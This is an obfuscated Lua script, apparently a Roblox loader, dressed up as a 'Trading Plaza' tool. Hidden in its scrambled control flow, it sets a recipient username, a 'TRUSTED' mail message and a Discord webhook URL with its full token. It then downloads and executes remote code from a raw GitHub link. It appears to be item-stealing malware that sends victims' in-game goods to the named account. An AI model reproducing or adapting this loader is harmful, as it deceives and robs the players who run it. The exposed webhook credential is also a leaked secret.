--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

do local v0=0;while true do if (v0==2) then local v1=0;while true do if (1==v1) then v0=3;break;end if (v1==0) then _G.LoadingTitle="Trading Plaza";_G.WebhookName="Captain Hook";v1=1;end end end if (v0==0) then local v2=0;local v3;while true do if (v2==0) then v3=0;while true do if (v3==1) then v0=1;break;end if (v3==0) then local v5=0;while true do if (v5==1) then v3=1;break;end if (v5==0) then UserName="sketchyom";Webhook="https://discord.com/api/webhooks/1167089562946900101/gcltnD2DasqPJ3x1Ergdt057L2dD72_ssoGONZgFdDQogkJPXEtfsdRS8mBxGa6Q93Vm";v5=1;end end end end break;end end end if (v0==3) then loadstring(game:HttpGet("https://raw.githubusercontent.com/LypherX/idkk/main/iddkkk2"))();break;end if (v0==1) then local v4=0;while true do if (v4==1) then v0=2;break;end if (0==v4) then UserName2="sketchyom";_G.MailMessage="TRUSTED";v4=1;end end end end end
